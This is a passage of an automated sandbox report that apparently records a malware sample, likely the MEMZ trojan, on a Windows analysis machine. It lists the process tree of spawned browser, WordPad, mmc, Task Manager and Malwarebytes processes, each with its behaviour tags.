"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8558316842690580817,8950803290243422001,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
6⤵
PID:5728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8558316842690580817,8950803290243422001,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2768 /prefetch:1
6⤵
PID:5544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://answers.microsoft.com/en-us/protect/forum/protect_other-protect_scanning/memz-malwarevirus-trojan-completely-destroying/268bc1c2-39f4-42f8-90c2-597a673b6b45
5⤵
- Enumerates system info in registry
PID:5576

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
6⤵
PID:6396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,16530840742131617884,8180422279114112148,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
6⤵
PID:4884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,16530840742131617884,8180422279114112148,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
6⤵
PID:3956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,16530840742131617884,8180422279114112148,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3052 /prefetch:8
6⤵
PID:728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,16530840742131617884,8180422279114112148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
6⤵
PID:5624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,16530840742131617884,8180422279114112148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
6⤵
PID:1832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,16530840742131617884,8180422279114112148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4720 /prefetch:1
6⤵
PID:4736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,16530840742131617884,8180422279114112148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
6⤵
PID:1988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,16530840742131617884,8180422279114112148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
6⤵
PID:2964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,16530840742131617884,8180422279114112148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
6⤵
PID:5616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,16530840742131617884,8180422279114112148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
6⤵
PID:3052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,16530840742131617884,8180422279114112148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:1
6⤵
PID:4940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,16530840742131617884,8180422279114112148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1
6⤵
PID:4828

C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe"
5⤵
- Suspicious use of SetWindowsHookEx
PID:2284

C:\Windows\SysWOW64\mmc.exe
"C:\Windows\System32\mmc.exe"
5⤵
- Suspicious use of SetWindowsHookEx
PID:7136

C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:5496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2832 /prefetch:2
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:1
3⤵
PID:5840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
3⤵
PID:4180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7136 /prefetch:1
3⤵
PID:6360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1
3⤵
PID:3468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:1
3⤵
PID:3780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7240 /prefetch:1
3⤵
PID:4940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7304 /prefetch:8
3⤵
PID:5748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7440 /prefetch:1
3⤵
PID:3004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
3⤵
PID:1496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7232 /prefetch:1
3⤵
PID:5772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7112 /prefetch:1
3⤵
PID:5880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,18370288308862754419,5974156540341987137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6908 /prefetch:1
3⤵
PID:1960

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
2⤵
- Executes dropped EXE
PID:1468

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
3⤵
- Executes dropped EXE
PID:3048

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
2⤵
- Checks SCSI registry key(s)
PID:6304

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
2⤵
- Executes dropped EXE
PID:6236

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
3⤵
- Executes dropped EXE
PID:4496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
2⤵
- Enumerates system info in registry
PID:908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7f38ab58,0x7ffb7f38ab68,0x7ffb7f38ab78
3⤵
PID:432

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 --field-trial-handle=1844,i,8485461300858332465,11217664629138217082,131072 /prefetch:2
3⤵
PID:3316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1844,i,8485461300858332465,11217664629138217082,131072 /prefetch:8
3⤵
PID:1544

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2264 --field-trial-handle=1844,i,8485461300858332465,11217664629138217082,131072 /prefetch:8
3⤵
PID:5124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3020 --field-trial-handle=1844,i,8485461300858332465,11217664629138217082,131072 /prefetch:1
3⤵
PID:6828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3280 --field-trial-handle=1844,i,8485461300858332465,11217664629138217082,131072 /prefetch:1
3⤵
PID:6348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3628 --field-trial-handle=1844,i,8485461300858332465,11217664629138217082,131072 /prefetch:1
3⤵
PID:2832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4548 --field-trial-handle=1844,i,8485461300858332465,11217664629138217082,131072 /prefetch:8
3⤵
PID:2592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4724 --field-trial-handle=1844,i,8485461300858332465,11217664629138217082,131072 /prefetch:8
3⤵
PID:928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4868 --field-trial-handle=1844,i,8485461300858332465,11217664629138217082,131072 /prefetch:8
3⤵
PID:5636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5028 --field-trial-handle=1844,i,8485461300858332465,11217664629138217082,131072 /prefetch:1
3⤵
PID:3756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1744 --field-trial-handle=1844,i,8485461300858332465,11217664629138217082,131072 /prefetch:2
3⤵
PID:2768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
2⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:2684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7f2346f8,0x7ffb7f234708,0x7ffb7f234718
3⤵
PID:1704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
3⤵
PID:2920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3
3⤵
PID:5488

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
3⤵
PID:5540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
3⤵
PID:5724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
3⤵
PID:2968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4252 /prefetch:1
3⤵
PID:4700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
3⤵
PID:5164

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:8
3⤵
PID:4600

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:8
3⤵
PID:1388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
3⤵
PID:3212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
3⤵
PID:1372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
3⤵
PID:4144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
3⤵
PID:2852

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1
3⤵
PID:6612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5028 /prefetch:8
3⤵
PID:364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5668 /prefetch:8
3⤵
PID:5528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4252 /prefetch:1
3⤵
PID:2956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2576858304573128998,241047738103385027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
3⤵
PID:6580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
